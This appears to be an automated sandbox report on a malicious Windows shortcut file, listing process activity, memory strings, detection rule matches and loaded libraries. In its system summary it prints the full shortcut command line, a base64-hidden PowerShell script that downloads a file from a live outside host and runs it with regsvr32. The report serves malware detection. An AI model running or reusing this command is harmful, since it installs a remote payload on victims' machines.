Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Jan 2025 09:04:36 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: svchost.exe, 00000003.00000002.2436735024.000001BD5F065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1252433128.0000027B842E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84574000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://focusmedica.in
Source: powershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmp, gjRzEyUDTV.ps1.0.drString found in binary or memory: http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/
Source: powershell.exe, 00000000.00000002.1305717837.000001A863082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A8716D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A871813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B93134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84900000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png.1
Source: powershell.exe, 00000000.00000002.1305717837.000001A861661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B82F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html.1
Source: powershell.exe, 00000000.00000002.1305717837.000001A861661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B82F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000003.00000003.1202965974.000001BD63262000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester.1
Source: powershell.exe, 00000000.00000002.1305717837.000001A862292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B83BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1305717837.000001A863082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A8716D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A871813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B93134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84900000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 6984, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows shortcut file (LNK) contains suspicious command line arguments
Source: DRlFlg7OV8.lnkLNK file: -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "%tmp%\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "%tmp%\gjRzEyUDTV.ps1"; Remove-Item "%tmp%\gjRzEyUDTV.ps1"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: Process Memory Space: powershell.exe PID: 6984, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.evad.winLNK@7/12@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlc1jgvp.j20.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: DRlFlg7OV8.lnkVirustotal: Detection: 62%
Source: DRlFlg7OV8.lnkReversingLabs: Detection: 66%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMoJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
Source: DRlFlg7OV8.lnkLNK file: ..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
